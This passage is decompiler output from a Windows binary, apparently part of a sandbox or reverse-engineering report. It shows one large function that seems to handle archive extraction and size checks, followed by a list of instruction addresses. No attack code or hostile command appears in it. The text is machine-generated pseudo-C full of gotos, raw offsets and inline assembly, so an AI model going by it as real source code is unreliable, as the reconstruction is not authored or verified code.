                                                    																													}
                                                    																													L169:
                                                    																													E00CC1F47(_t582);
                                                    																													__eflags =  *((char*)(_t582 + 0x3331));
                                                    																													if( *((char*)(_t582 + 0x3331)) != 0) {
                                                    																														L172:
                                                    																														_t448 = 0;
                                                    																														__eflags = 0;
                                                    																														_t624 = 0;
                                                    																														L173:
                                                    																														__eflags =  *(_t582 + 0x3388);
                                                    																														if( *(_t582 + 0x3388) != 0) {
                                                    																															__eflags =  *((char*)(_t582 + 0x22b8));
                                                    																															if( *((char*)(_t582 + 0x22b8)) == 0) {
                                                    																																L181:
                                                    																																__eflags =  *(_t721 - 0xd);
                                                    																																 *((char*)(_t721 - 0x10)) = _t448;
                                                    																																if( *(_t721 - 0xd) != 0) {
                                                    																																	L191:
                                                    																																	__eflags =  *(_t721 - 0x20);
                                                    																																	_t691 =  *((intOrPtr*)(_t721 - 0xf));
                                                    																																	if( *(_t721 - 0x20) == 0) {
                                                    																																		L195:
                                                    																																		_t625 = 0;
                                                    																																		__eflags = 0;
                                                    																																		L196:
                                                    																																		__eflags =  *((char*)(_t721 - 0x12));
                                                    																																		if( *((char*)(_t721 - 0x12)) != 0) {
                                                    																																			goto L218;
                                                    																																		}
                                                    																																		_t713 =  *(_t721 - 0x18);
                                                    																																		__eflags = _t713 -  *((intOrPtr*)(_t721 - 0x30));
                                                    																																		if(_t713 ==  *((intOrPtr*)(_t721 - 0x30))) {
                                                    																																			L199:
                                                    																																			__eflags =  *(_t721 - 0x20);
                                                    																																			if( *(_t721 - 0x20) == 0) {
                                                    																																				L203:
                                                    																																				__eflags = _t448;
                                                    																																				if(_t448 == 0) {
                                                    																																					L206:
                                                    																																					__eflags = _t625;
                                                    																																					if(_t625 != 0) {
                                                    																																						L214:
                                                    																																						_t449 =  *(_t697 + 8);
                                                    																																						__eflags =  *((char*)(_t449 + 0x71a8));
                                                    																																						if( *((char*)(_t449 + 0x71a8)) == 0) {
                                                    																																							_t714 = _t697 + 0x1100;
                                                    																																							_t450 = E00CCA4ED(_t697 + 0x1100,  *((intOrPtr*)(_t582 + 0x22bc))); // executed
                                                    																																							__eflags = _t450;
                                                    																																							if(__eflags == 0) {
                                                    																																								E00CC2021(__eflags, 0x11, _t582 + 0x32, _t714);
                                                    																																								E00CC6DCB(0xd01098, __eflags);
                                                    																																							}
                                                    																																						}
                                                    																																						 *(_t697 + 0x10ff) = 1;
                                                    																																						goto L218;
                                                    																																					}
                                                    																																					_t692 =  *(_t721 - 0x24);
                                                    																																					__eflags = _t692;
                                                    																																					_t628 =  *(_t721 - 0x28);
                                                    																																					if(_t692 > 0) {
                                                    																																						L209:
                                                    																																						__eflags = _t448;
                                                    																																						if(_t448 != 0) {
                                                    																																							L212:
                                                    																																							_t341 = _t721 - 0x1070; // -2160
                                                    																																							E00CC9F09(_t341);
                                                    																																							L213:
                                                    																																							_t702 = _t582 + 0x32d8;
                                                    																																							asm("sbb eax, eax");
                                                    																																							asm("sbb ecx, ecx");
                                                    																																							asm("sbb eax, eax");
                                                    																																							_t349 = _t721 - 0x1070; // -2160
                                                    																																							E00CC9DA2(_t349, _t582 + 0x32e8,  ~( *( *(_t697 + 8) + 0x82d0)) & _t702,  ~( *( *(_t697 + 8) + 0x82d4)) & _t582 + 0x000032e0,  ~( *( *(_t697 + 8) + 0x82d8)) & _t582 + 0x000032e8);
                                                    																																							_t350 = _t721 - 0x1070; // -2160
                                                    																																							E00CC9620(_t350);
                                                    																																							E00CC7A78( *((intOrPtr*)(_t721 - 0x1c)),  *((intOrPtr*)( *((intOrPtr*)(_t721 - 0x1c)) + 8)), _t582,  *((intOrPtr*)(_t721 - 0x38)));
                                                    																																							asm("sbb eax, eax");
                                                    																																							asm("sbb eax, eax");
                                                    																																							__eflags =  ~( *( *((intOrPtr*)( *((intOrPtr*)(_t721 - 0x1c)) + 8)) + 0x82d0)) & _t702;
                                                    																																							E00CC9D9F( ~( *( *((intOrPtr*)( *((intOrPtr*)(_t721 - 0x1c)) + 8)) + 0x82d0)) & _t702,  ~( *( *((intOrPtr*)( *((intOrPtr*)(_t721 - 0x1c)) + 8)) + 0x82d0)) & _t702,  ~( *( *((intOrPtr*)( *((intOrPtr*)(_t721 - 0x1c)) + 8)) + 0x82d8)) & _t582 + 0x000032e8);
                                                    																																							_t697 =  *((intOrPtr*)(_t721 - 0x1c));
                                                    																																							goto L214;
                                                    																																						}
                                                    																																						__eflags =  *((intOrPtr*)(_t697 + 0x88)) - _t628;
                                                    																																						if( *((intOrPtr*)(_t697 + 0x88)) != _t628) {
                                                    																																							goto L212;
                                                    																																						}
                                                    																																						__eflags =  *((intOrPtr*)(_t697 + 0x8c)) - _t692;
                                                    																																						if( *((intOrPtr*)(_t697 + 0x8c)) == _t692) {
                                                    																																							goto L213;
                                                    																																						}
                                                    																																						goto L212;
                                                    																																					}
                                                    																																					__eflags = _t628;
                                                    																																					if(_t628 == 0) {
                                                    																																						goto L213;
                                                    																																					}
                                                    																																					goto L209;
                                                    																																				}
                                                    																																				_t473 =  *(_t697 + 8);
                                                    																																				__eflags =  *((char*)(_t473 + 0x71a0));
                                                    																																				if( *((char*)(_t473 + 0x71a0)) == 0) {
                                                    																																					goto L218;
                                                    																																				}
                                                    																																				_t448 =  *((intOrPtr*)(_t721 - 0x10));
                                                    																																				goto L206;
                                                    																																			}
                                                    																																			__eflags = _t625;
                                                    																																			if(_t625 != 0) {
                                                    																																				goto L203;
                                                    																																			}
                                                    																																			__eflags =  *(_t582 + 0x3398) - 5;
                                                    																																			if( *(_t582 + 0x3398) != 5) {
                                                    																																				goto L218;
                                                    																																			}
                                                    																																			__eflags = _t691;
                                                    																																			if(_t691 == 0) {
                                                    																																				goto L218;
                                                    																																			}
                                                    																																			goto L203;
                                                    																																		}
                                                    																																		__eflags = _t713 -  *((intOrPtr*)(_t721 - 0x34));
                                                    																																		if(_t713 !=  *((intOrPtr*)(_t721 - 0x34))) {
                                                    																																			goto L218;
                                                    																																		}
                                                    																																		goto L199;
                                                    																																	}
                                                    																																	__eflags =  *(_t582 + 0x3398) - 4;
                                                    																																	if( *(_t582 + 0x3398) != 4) {
                                                    																																		goto L195;
                                                    																																	}
                                                    																																	__eflags = _t691;
                                                    																																	if(_t691 == 0) {
                                                    																																		goto L195;
                                                    																																	}
                                                    																																	_t625 = 1;
                                                    																																	goto L196;
                                                    																																}
                                                    																																__eflags =  *((char*)(_t721 - 0x14));
                                                    																																if( *((char*)(_t721 - 0x14)) == 0) {
                                                    																																	goto L191;
                                                    																																}
                                                    																																__eflags = _t624;
                                                    																																if(_t624 != 0) {
                                                    																																	goto L191;
                                                    																																}
                                                    																																__eflags =  *(_t582 + 0x3333) - _t624;
                                                    																																if(__eflags == 0) {
                                                    																																	L189:
                                                    																																	_push(3);
                                                    																																	L190:
                                                    																																	_pop(_t637);
                                                    																																	_t321 = _t721 - 0x30b8; // -10424
                                                    																																	E00CC2021(__eflags, _t637, _t582 + 0x32, _t321);
                                                    																																	 *((char*)(_t721 - 0x10)) = 1;
                                                    																																	E00CC6D83(0xd01098, 3);
                                                    																																	_t448 =  *((intOrPtr*)(_t721 - 0x10));
                                                    																																	goto L191;
                                                    																																}
                                                    																																__eflags =  *((intOrPtr*)(_t582 + 0x3359)) - _t624;
                                                    																																if( *((intOrPtr*)(_t582 + 0x3359)) == _t624) {
                                                    																																	L187:
                                                    																																	__eflags =  *((char*)(_t697 + 0xfc));
                                                    																																	if(__eflags != 0) {
                                                    																																		goto L189;
                                                    																																	}
                                                    																																	_push(4);
                                                    																																	goto L190;
                                                    																																}
                                                    																																__eflags =  *(_t582 + 0x6cdc) - _t624;
                                                    																																if(__eflags == 0) {
                                                    																																	goto L189;
                                                    																																}
                                                    																																goto L187;
                                                    																															}
                                                    																															__eflags =  *(_t582 + 0x32fc) - _t448;
                                                    																															if(__eflags < 0) {
                                                    																																goto L181;
                                                    																															}
                                                    																															if(__eflags > 0) {
                                                    																																L179:
                                                    																																__eflags = _t624;
                                                    																																if(_t624 != 0) {
                                                    																																	 *((char*)(_t697 + 0xfc)) = 1;
                                                    																																}
                                                    																																goto L181;
                                                    																															}
                                                    																															__eflags =  *(_t582 + 0x32f8) - _t448;
                                                    																															if( *(_t582 + 0x32f8) <= _t448) {
                                                    																																goto L181;
                                                    																															}
                                                    																															goto L179;
                                                    																														}
                                                    																														 *((char*)(_t697 + 0xfc)) = _t448;
                                                    																														goto L181;
                                                    																													}
                                                    																													asm("sbb eax, eax");
                                                    																													_t482 = E00CCAAEA(_t582, _t697 + 0xd0, _t582 + 0x3308,  ~( *(_t582 + 0x3362) & 0x000000ff) & _t582 + 0x00003363);
                                                    																													__eflags = _t482;
                                                    																													if(_t482 == 0) {
                                                    																														goto L172;
                                                    																													}
                                                    																													_t624 = 1;
                                                    																													_t448 = 0;
                                                    																													goto L173;
                                                    																												}
                                                    																												_t716 =  *(_t582 + 0x3398);
                                                    																												__eflags = _t716 - 4;
                                                    																												if(_t716 == 4) {
                                                    																													L151:
                                                    																													_push(0x800);
                                                    																													_t270 = _t721 - 0x50b8; // -18616
                                                    																													_push(_t582 + 0x339c);
                                                    																													E00CCB76C(_t582);
                                                    																													_push(0x800);
                                                    																													_t272 = _t721 - 0x40b8; // -14520
                                                    																													_t645 = _t697;
                                                    																													_t273 = _t721 - 0x50b8; // -18616
                                                    																													_push(_t582);
                                                    																													E00CC8167(__eflags);
                                                    																													_t446 =  *((intOrPtr*)(_t721 - 0x10));
                                                    																													__eflags = _t446;
                                                    																													if(_t446 == 0) {
                                                    																														L159:
                                                    																														_t646 =  *((intOrPtr*)(_t721 - 0xf));
                                                    																														L160:
                                                    																														__eflags =  *((intOrPtr*)(_t582 + 0x6cc8)) - 2;
                                                    																														if( *((intOrPtr*)(_t582 + 0x6cc8)) != 2) {
                                                    																															L146:
                                                    																															__eflags = _t446;
                                                    																															if(_t446 == 0) {
                                                    																																L163:
                                                    																																_t495 = 0;
                                                    																																__eflags = 0;
                                                    																																L164:
                                                    																																 *(_t697 + 0x10ff) = _t495;
                                                    																																goto L169;
                                                    																															}
                                                    																															L147:
                                                    																															__eflags = _t646;
                                                    																															if(_t646 == 0) {
                                                    																																goto L163;
                                                    																															}
                                                    																															_t495 = 1;
                                                    																															goto L164;
                                                    																														}
                                                    																														__eflags = _t446;
                                                    																														if(_t446 != 0) {
                                                    																															goto L147;
                                                    																														}
                                                    																														L145:
                                                    																														 *((char*)(_t721 - 0x14)) = 0;
                                                    																														goto L146;
                                                    																													}
                                                    																													__eflags =  *((short*)(_t721 - 0x40b8));
                                                    																													if( *((short*)(_t721 - 0x40b8)) == 0) {
                                                    																														goto L159;
                                                    																													}
                                                    																													_t276 = _t721 - 0x40b8; // -14520
                                                    																													_push(0x800);
                                                    																													_push(_t697 + 0x1100);
                                                    																													__eflags = _t716 - 4;
                                                    																													if(__eflags != 0) {
                                                    																														_push(_t582 + 0x32);
                                                    																														_t281 = _t721 - 0x1070; // -2160
                                                    																														_t500 = E00CC9155(_t690, _t697, _t716, __eflags);
                                                    																														_t646 = _t500;
                                                    																														 *((char*)(_t721 - 0xf)) = _t500;
                                                    																														L157:
                                                    																														__eflags = _t646;
                                                    																														if(_t646 == 0) {
                                                    																															L144:
                                                    																															_t446 =  *((intOrPtr*)(_t721 - 0x10));
                                                    																															goto L145;
                                                    																														}
                                                    																														_t446 =  *((intOrPtr*)(_t721 - 0x10));
                                                    																														goto L160;
                                                    																													}
                                                    																													_push( *(_t697 + 8));
                                                    																													_t501 = E00CC7542(_t645, _t697, __eflags);
                                                    																													L155:
                                                    																													_t646 = _t501;
                                                    																													 *((char*)(_t721 - 0xf)) = _t646;
                                                    																													goto L157;
                                                    																												}
                                                    																												__eflags = _t716 - 5;
                                                    																												if(_t716 == 5) {
                                                    																													goto L151;
                                                    																												}
                                                    																												__eflags = _t716 - 1;
                                                    																												if(_t716 == 1) {
                                                    																													L149:
                                                    																													__eflags = _t446;
                                                    																													if(_t446 == 0) {
                                                    																														goto L159;
                                                    																													}
                                                    																													_push(_t697 + 0x1100);
                                                    																													_t501 = E00CC77B8(_t622, _t697 + 0x10, _t582);
                                                    																													goto L155;
                                                    																												}
                                                    																												__eflags = _t716 - 2;
                                                    																												if(_t716 == 2) {
                                                    																													goto L149;
                                                    																												}
                                                    																												__eflags = _t716 - 3;
                                                    																												if(__eflags == 0) {
                                                    																													goto L149;
                                                    																												}
                                                    																												E00CC2021(__eflags, 0x47, _t582 + 0x32, _t697 + 0x1100);
                                                    																												__eflags = 0;
                                                    																												_t646 = 0;
                                                    																												 *((char*)(_t721 - 0xf)) = 0;
                                                    																												goto L144;
                                                    																											}
                                                    																											__eflags = _t445;
                                                    																											if(_t445 != 0) {
                                                    																												goto L136;
                                                    																											}
                                                    																											_t508 = 0x50;
                                                    																											__eflags =  *(_t721 - 0x18) - _t508;
                                                    																											if( *(_t721 - 0x18) == _t508) {
                                                    																												goto L136;
                                                    																											}
                                                    																											_t446 = 1;
                                                    																											 *((char*)(_t721 - 0x10)) = 1;
                                                    																											goto L137;
                                                    																										}
                                                    																										__eflags =  *(_t582 + 0x6cdc);
                                                    																										if( *(_t582 + 0x6cdc) != 0) {
                                                    																											goto L132;
                                                    																										}
                                                    																										_t717 =  *(_t582 + 0x32fc);
                                                    																										_t695 =  *(_t582 + 0x32f8);
                                                    																										__eflags = _t717;
                                                    																										if(__eflags < 0) {
                                                    																											L131:
                                                    																											_t690 = 0;
                                                    																											__eflags = 0;
                                                    																											_t712 = _t697 + 0x10;
                                                    																											goto L132;
                                                    																										}
                                                    																										if(__eflags > 0) {
                                                    																											L119:
                                                    																											_t649 =  *(_t582 + 0x32f0);
                                                    																											_t650 = _t649 << 0xa;
                                                    																											__eflags = ( *(_t582 + 0x32f4) << 0x00000020 | _t649) << 0xa - _t717;
                                                    																											if(__eflags < 0) {
                                                    																												L130:
                                                    																												_t445 =  *(_t721 - 0xd);
                                                    																												goto L131;
                                                    																											}
                                                    																											if(__eflags > 0) {
                                                    																												L122:
                                                    																												__eflags =  *((intOrPtr*)(_t582 + 0x10)) - 1;
                                                    																												if( *((intOrPtr*)(_t582 + 0x10)) == 1) {
                                                    																													goto L130;
                                                    																												}
                                                    																												__eflags = _t717;
                                                    																												if(__eflags < 0) {
                                                    																													L129:
                                                    																													_t244 = _t721 - 0x1070; // -2160
                                                    																													E00CC9A3C(_t244,  *(_t582 + 0x32f8),  *(_t582 + 0x32fc));
                                                    																													 *(_t721 - 0x28) =  *(_t582 + 0x32f8);
                                                    																													 *(_t721 - 0x24) =  *(_t582 + 0x32fc);
                                                    																													goto L130;
                                                    																												}
                                                    																												if(__eflags > 0) {
                                                    																													L126:
                                                    																													_t515 = E00CC981A(_t695);
                                                    																													__eflags = _t695 -  *(_t582 + 0x32f4);
                                                    																													if(__eflags < 0) {
                                                    																														goto L130;
                                                    																													}
                                                    																													if(__eflags > 0) {
                                                    																														goto L129;
                                                    																													}
                                                    																													__eflags = _t515 -  *(_t582 + 0x32f0);
                                                    																													if(_t515 <=  *(_t582 + 0x32f0)) {
                                                    																														goto L130;
                                                    																													}
                                                    																													goto L129;
                                                    																												}
                                                    																												__eflags = _t695 - 0x5f5e100;
                                                    																												if(_t695 < 0x5f5e100) {
                                                    																													goto L129;
                                                    																												}
                                                    																												goto L126;
                                                    																											}
                                                    																											__eflags = _t650 - _t695;
                                                    																											if(_t650 <= _t695) {
                                                    																												goto L130;
                                                    																											}
                                                    																											goto L122;
                                                    																										}
                                                    																										__eflags = _t695 - 0xf4240;
                                                    																										if(_t695 <= 0xf4240) {
                                                    																											goto L131;
                                                    																										}
                                                    																										goto L119;
                                                    																									}
                                                    																									L113:
                                                    																									_t202 = _t697 + 0xec;
                                                    																									 *_t202 =  *(_t697 + 0xec) + 1;
                                                    																									__eflags =  *_t202;
                                                    																									goto L114;
                                                    																								}
                                                    																								 *((char*)(_t721 - 0x12)) = 0;
                                                    																								_t517 = 0x50;
                                                    																								__eflags = _t616 - _t517;
                                                    																								if(_t616 != _t517) {
                                                    																									_t196 = _t721 - 0x1070; // -2160
                                                    																									__eflags = E00CC98BC(_t196);
                                                    																									if(__eflags != 0) {
                                                    																										E00CC2021(__eflags, 0x3b, _t582 + 0x32, _t697 + 0x1100);
                                                    																										E00CC6E98(0xd01098, _t721, _t582 + 0x32, _t697 + 0x1100);
                                                    																									}
                                                    																								}
                                                    																								goto L113;
                                                    																							}
                                                    																							 *(_t697 + 0x10ff) = 1;
                                                    																							__eflags =  *((char*)(_t435 + 0x7201));
                                                    																							if( *((char*)(_t435 + 0x7201)) != 0) {
                                                    																								_t436 =  *(_t721 - 0xd);
                                                    																								goto L112;
                                                    																							}
                                                    																							goto L107;
                                                    																						}
                                                    																						 *(_t721 - 0xd) = _t431;
                                                    																						 *(_t721 - 0xe) = _t431;
                                                    																						_t185 = _t721 - 0x30b8; // -10424
                                                    																						_t525 = L00CD1B7F(__eflags, _t185, 0, 0, _t431);
                                                    																						__eflags = _t525;
                                                    																						if(_t525 != 0) {
                                                    																							goto L104;
                                                    																						}
                                                    																						__eflags = 0;
                                                    																						 *(_t721 - 0x24) = 0;
                                                    																						L102:
                                                    																						_t187 = _t721 - 0x1070; // -2160
                                                    																						E00CC959A(_t187);
                                                    																						_t406 =  *(_t721 - 0x24);
                                                    																						goto L15;
                                                    																					}
                                                    																					_t180 = _t721 - 0x1070; // -2160
                                                    																					_push(_t582);
                                                    																					_t529 = E00CC7FC0(_t697);
                                                    																					_t613 = _t529;
                                                    																					 *(_t721 - 0xe) = _t529;
                                                    																					L97:
                                                    																					__eflags = _t613;
                                                    																					if(_t613 != 0) {
                                                    																						goto L104;
                                                    																					}
                                                    																					goto L98;
                                                    																				}
                                                    																				__eflags =  *(_t721 - 0xe);
                                                    																				if( *(_t721 - 0xe) != 0) {
                                                    																					_t530 =  *(_t721 - 0x18);
                                                    																					__eflags = _t530 - 0x50;
                                                    																					if(_t530 != 0x50) {
                                                    																						_t657 = 0x49;
                                                    																						__eflags = _t530 - _t657;
                                                    																						if(_t530 != _t657) {
                                                    																							_t658 = 0x45;
                                                    																							__eflags = _t530 - _t658;
                                                    																							if(_t530 != _t658) {
                                                    																								_t531 =  *(_t697 + 8);
                                                    																								__eflags =  *((intOrPtr*)(_t531 + 0x7160)) - 1;
                                                    																								if( *((intOrPtr*)(_t531 + 0x7160)) != 1) {
                                                    																									 *(_t697 + 0xec) =  *(_t697 + 0xec) + 1;
                                                    																									_t178 = _t721 - 0x30b8; // -10424
                                                    																									_push(_t582);
                                                    																									E00CC7DB2(_t697);
                                                    																								}
                                                    																							}
                                                    																						}
                                                    																					}
                                                    																				}
                                                    																				goto L102;
                                                    																			}
                                                    																			__eflags = _t611 - 5;
                                                    																			if(_t611 == 5) {
                                                    																				goto L88;
                                                    																			}
                                                    																			_t613 =  *(_t721 - 0xe);
                                                    																			__eflags = _t613;
                                                    																			if(_t613 == 0) {
                                                    																				goto L99;
                                                    																			}
                                                    																			_t616 =  *(_t721 - 0x18);
                                                    																			__eflags = _t616 - _t688;
                                                    																			if(_t616 == _t688) {
                                                    																				goto L105;
                                                    																			}
                                                    																			_t534 =  *(_t697 + 8);
                                                    																			__eflags =  *((char*)(_t534 + 0x7201));
                                                    																			if( *((char*)(_t534 + 0x7201)) != 0) {
                                                    																				goto L105;
                                                    																			}
                                                    																			_t719 = _t697 + 0x1100;
                                                    																			 *((char*)(_t721 - 0x12)) = 0;
                                                    																			_t536 = E00CCA231(_t719);
                                                    																			__eflags = _t536;
                                                    																			if(_t536 == 0) {
                                                    																				L86:
                                                    																				__eflags =  *((char*)(_t721 - 0x12));
                                                    																				if( *((char*)(_t721 - 0x12)) == 0) {
                                                    																					goto L104;
                                                    																				}
                                                    																				L87:
                                                    																				_t613 = 0;
                                                    																				 *(_t721 - 0xe) = 0;
                                                    																				goto L97;
                                                    																			}
                                                    																			__eflags =  *((char*)(_t721 - 0x12));
                                                    																			if( *((char*)(_t721 - 0x12)) != 0) {
                                                    																				goto L87;
                                                    																			}
                                                    																			__eflags = 0;
                                                    																			_push(0);
                                                    																			_push(_t582 + 0x32d8);
                                                    																			_push( *(_t582 + 0x32fc));
                                                    																			_t167 = _t721 - 0x12; // 0x7ee
                                                    																			_push( *(_t582 + 0x32f8));
                                                    																			_push(0x800);
                                                    																			_push(_t719);
                                                    																			_push(0);
                                                    																			_push( *(_t697 + 8));
                                                    																			E00CC92A3();
                                                    																			goto L86;
                                                    																		}
                                                    																		__eflags =  *((char*)(_t582 + 0x3359));
                                                    																		if( *((char*)(_t582 + 0x3359)) == 0) {
                                                    																			goto L77;
                                                    																		}
                                                    																		_t137 = _t721 - 0x2c; // 0x7d4
                                                    																		_t543 = E00CE0C4A(_t582 + 0x335a, _t137, 8);
                                                    																		_t723 = _t725 + 0xc;
                                                    																		__eflags = _t543;
                                                    																		if(_t543 == 0) {
                                                    																			goto L77;
                                                    																		}
                                                    																		__eflags =  *(_t582 + 0x6cdc);
                                                    																		_t697 =  *((intOrPtr*)(_t721 - 0x1c));
                                                    																		if( *(_t582 + 0x6cdc) != 0) {
                                                    																			goto L78;
                                                    																		}
                                                    																		__eflags =  *((char*)(_t697 + 0x10fe));
                                                    																		_t142 = _t721 - 0x30b8; // -10424
                                                    																		_push(_t582 + 0x32);
                                                    																		if(__eflags != 0) {
                                                    																			_push(6);
                                                    																			E00CC2021(__eflags);
                                                    																			E00CC6D83(0xd01098, 0xb);
                                                    																			 *(_t721 - 0xe) = 0;
                                                    																			goto L78;
                                                    																		}
                                                    																		_push(0x83);
                                                    																		E00CC2021(__eflags);
                                                    																		E00CCF279( *(_t697 + 8) + 0x6024);
                                                    																		 *(_t721 - 4) =  *(_t721 - 4) | 0xffffffff;
                                                    																		_t147 = _t721 - 0x1174; // -2420
                                                    																		L00CCF204(_t147);
                                                    																	}
                                                    																}
                                                    																E00CC6D83(0xd01098, 2);
                                                    																_t554 = E00CC1F47(_t582);
                                                    																__eflags =  *(_t582 + 0x6ccc);
                                                    																_t406 = _t554 & 0xffffff00 |  *(_t582 + 0x6ccc) == 0x00000000;
                                                    																goto L15;
                                                    															}
                                                    															_t106 = _t721 - 0x10a8; // -2216
                                                    															_t556 = E00CC7BE7(_t106, _t582 + 0x32d8);
                                                    															__eflags = _t556;
                                                    															if(_t556 == 0) {
                                                    																goto L65;
                                                    															}
                                                    															__eflags =  *((char*)(_t721 - 0x10ac));
                                                    															if( *((char*)(_t721 - 0x10ac)) == 0) {
                                                    																L63:
                                                    																 *(_t721 - 0xe) = 0;
                                                    																goto L65;
                                                    															}
                                                    															_t108 = _t721 - 0x10a8; // -2216
                                                    															_t558 = E00CC7BCA(_t108, _t697);
                                                    															__eflags = _t558;
                                                    															if(_t558 == 0) {
                                                    																goto L65;
                                                    															}
                                                    															goto L63;
                                                    														}
                                                    														__eflags = _t707 - _t686;
                                                    														if(_t707 != _t686) {
                                                    															goto L65;
                                                    														}
                                                    														goto L59;
                                                    													}
                                                    													__eflags =  *((char*)(_t411 + 0x715c));
                                                    													if( *((char*)(_t411 + 0x715c)) == 0) {
                                                    														goto L65;
                                                    													}
                                                    													goto L57;
                                                    												}
                                                    												__eflags =  *(_t697 + 0x1100);
                                                    												if( *(_t697 + 0x1100) == 0) {
                                                    													goto L54;
                                                    												}
                                                    												 *(_t721 - 0xe) = 1;
                                                    												__eflags =  *(_t582 + 0x3330);
                                                    												if( *(_t582 + 0x3330) == 0) {
                                                    													goto L55;
                                                    												}
                                                    												goto L54;
                                                    											}
                                                    											__eflags = _t707 - _t400;
                                                    											_t401 = 1;
                                                    											if(_t707 != _t400) {
                                                    												goto L50;
                                                    											}
                                                    											goto L49;
                                                    										}
                                                    										L45:
                                                    										_t689 =  *(_t582 + 0x6ccc);
                                                    										 *(_t721 - 0xd) = _t689;
                                                    										 *(_t721 - 0x28) = _t689;
                                                    										__eflags = _t689;
                                                    										if(_t689 == 0) {
                                                    											goto L220;
                                                    										}
                                                    										_t685 = 0;
                                                    										__eflags = 0;
                                                    										goto L47;
                                                    									}
                                                    									_t398 =  *(_t697 + 8);
                                                    									__eflags =  *(_t398 + 0x6127);
                                                    									if( *(_t398 + 0x6127) == 0) {
                                                    										goto L44;
                                                    									}
                                                    									__eflags =  *(_t582 + 0x6ccc);
                                                    									if( *(_t582 + 0x6ccc) != 0) {
                                                    										goto L14;
                                                    									}
                                                    									 *(_t721 - 0x11) = 0;
                                                    									goto L45;
                                                    								}
                                                    								__eflags =  *(_t697 + 0xf4) -  *((intOrPtr*)(_t586 + 0xb334));
                                                    								if( *(_t697 + 0xf4) <  *((intOrPtr*)(_t586 + 0xb334))) {
                                                    									goto L29;
                                                    								}
                                                    								__eflags =  *((char*)(_t697 + 0xf9));
                                                    								if( *((char*)(_t697 + 0xf9)) != 0) {
                                                    									goto L14;
                                                    								}
                                                    								goto L29;
                                                    							}
                                                    							if(__eflags < 0) {
                                                    								L25:
                                                    								 *(_t582 + 0x32f8) = _t684;
                                                    								 *(_t582 + 0x32fc) = _t684;
                                                    								goto L26;
                                                    							}
                                                    							__eflags =  *(_t582 + 0x32f8) - _t684;
                                                    							if( *(_t582 + 0x32f8) >= _t684) {
                                                    								goto L26;
                                                    							}
                                                    							goto L25;
                                                    						}
                                                    						if(__eflags < 0) {
                                                    							L21:
                                                    							 *(_t582 + 0x32f0) = _t684;
                                                    							 *(_t582 + 0x32f4) = _t684;
                                                    							goto L22;
                                                    						}
                                                    						__eflags =  *(_t582 + 0x32f0) - _t684;
                                                    						if( *(_t582 + 0x32f0) >= _t684) {
                                                    							goto L22;
                                                    						}
                                                    						goto L21;
                                                    					}
                                                    					if(_t383 != 3) {
                                                    						__eflags = _t383 - 5;
                                                    						if(_t383 != 5) {
                                                    							goto L9;
                                                    						}
                                                    						__eflags =  *((char*)(_t582 + 0x45c4));
                                                    						if( *((char*)(_t582 + 0x45c4)) == 0) {
                                                    							goto L14;
                                                    						}
                                                    						_push(_t585);
                                                    						_push(_t684);
                                                    						_push(_t704);
                                                    						_push(_t582);
                                                    						_t573 = E00CD8C8D();
                                                    						__eflags = _t573;
                                                    						if(_t573 != 0) {
                                                    							__eflags = 0;
                                                    							 *0xcf3278( *((intOrPtr*)(_t582 + 0x6cb8)),  *((intOrPtr*)(_t582 + 0x6cbc)), 0);
                                                    							 *((intOrPtr*)( *((intOrPtr*)( *_t582 + 0x10))))();
                                                    							goto L17;
                                                    						}
                                                    						L13:
                                                    						E00CC6D83(0xd01098, 1);
                                                    						goto L14;
                                                    					} else {
                                                    						if( *(_t697 + 0x10ff) != 0) {
                                                    							E00CC7A0D(_t582, _t721,  *(_t697 + 8), _t582, _t697 + 0x1100);
                                                    						}
                                                    						goto L9;
                                                    					}
                                                    				}
                                                    				if( *((intOrPtr*)(__ecx + 0x67)) == 0) {
                                                    					goto L14;
                                                    				}
                                                    				_push(_t585);
                                                    				_push(0);
                                                    				_t704 = __ecx + 0x10;
                                                    				_push(_t704);
                                                    				_push(_t582);
                                                    				 *(_t721 - 0x20) = _t704;
                                                    				if(E00CD8C8D() == 0) {
                                                    					goto L13;
                                                    				} else {
                                                    					_t585 =  *(_t721 - 0x18);
                                                    					_t684 = 0;
                                                    					goto L5;
                                                    				}
                                                    			}

                                                    0x00cc87fd
                                                    0x00cc8802
                                                    0x00cc8804
                                                    0x00cc883c
                                                    0x00cc883f
                                                    0x00cc884b
                                                    0x00cc884b
                                                    0x00cc884b
                                                    0x00cc884e
                                                    0x00cc884e
                                                    0x00cc8858
                                                    0x00cc885d
                                                    0x00cc885f
                                                    0x00cc8883
                                                    0x00cc8883
                                                    0x00cc888a
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc888c
                                                    0x00cc8896
                                                    0x00cc889b
                                                    0x00cc889d
                                                    0x00cc897f
                                                    0x00000000
                                                    0x00cc897f
                                                    0x00cc88a3
                                                    0x00cc88a6
                                                    0x00cc88b4
                                                    0x00cc88b5
                                                    0x00cc88b5
                                                    0x00cc88b7
                                                    0x00cc88b9
                                                    0x00cc88d5
                                                    0x00cc88df
                                                    0x00cc88e9
                                                    0x00cc88fb
                                                    0x00cc8900
                                                    0x00cc8907
                                                    0x00cc89a5
                                                    0x00cc89a5
                                                    0x00cc89a8
                                                    0x00cc89a8
                                                    0x00cc89ac
                                                    0x00cc89b2
                                                    0x00cc89b7
                                                    0x00cc89bd
                                                    0x00cc89c2
                                                    0x00cc89ca
                                                    0x00cc89cb
                                                    0x00cc89ce
                                                    0x00cc89d3
                                                    0x00cc89d4
                                                    0x00cc89d6
                                                    0x00cc8a5f
                                                    0x00cc8a61
                                                    0x00cc8a66
                                                    0x00cc8a68
                                                    0x00cc8ab6
                                                    0x00cc8ab9
                                                    0x00cc8abb
                                                    0x00cc8ad5
                                                    0x00cc8ad7
                                                    0x00cc8ad7
                                                    0x00cc8ad8
                                                    0x00cc8ad8
                                                    0x00cc8adf
                                                    0x00cc8b14
                                                    0x00cc8b16
                                                    0x00cc910c
                                                    0x00cc910c
                                                    0x00cc9110
                                                    0x00cc9116
                                                    0x00cc911b
                                                    0x00cc911f
                                                    0x00cc9122
                                                    0x00cc9125
                                                    0x00cc9127
                                                    0x00cc9127
                                                    0x00cc9127
                                                    0x00cc9127
                                                    0x00cc912d
                                                    0x00cc912d
                                                    0x00cc9131
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc9137
                                                    0x00cc9139
                                                    0x00cc8576
                                                    0x00cc8576
                                                    0x00000000
                                                    0x00cc8576
                                                    0x00cc913f
                                                    0x00cc9145
                                                    0x00cc8513
                                                    0x00cc8515
                                                    0x00000000
                                                    0x00cc8515
                                                    0x00cc914b
                                                    0x00cc914d
                                                    0x00000000
                                                    0x00cc914d
                                                    0x00cc8b1c
